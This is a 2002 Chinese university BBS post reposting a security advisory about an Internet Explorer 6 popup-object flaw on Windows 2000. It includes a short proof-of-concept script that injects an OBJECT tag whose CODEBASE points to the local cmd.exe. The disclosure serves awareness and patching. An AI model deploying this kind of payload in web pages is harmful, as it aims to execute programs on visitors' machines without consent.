荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: Kernel (空を见上げて), 信区: Security
标 题: 微软IE的弹出对象存在严重的可执行文件漏洞
发信站: 荔园晨风BBS站 (Sat Jan 19 11:25:14 2002), 转信
发布日期:2002-1-15
受影响系统:
IE 6.0.2600.0000
+ Windows 2000 Update Versions: Q312461; Q240308;Q313675
漏洞描述:
IE的PopUp对象允许插入一个内置对象,并且可以在高权限下运行本地的应用
程序。
下面是一个测试脚本:
<script>
var x = window.open();
x.document.body.innerHTML = ‘<OBJECT NAME="X" CLASSID="CLSID:
11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/cmd.
exe">‘;
</script>
--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.13.83]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店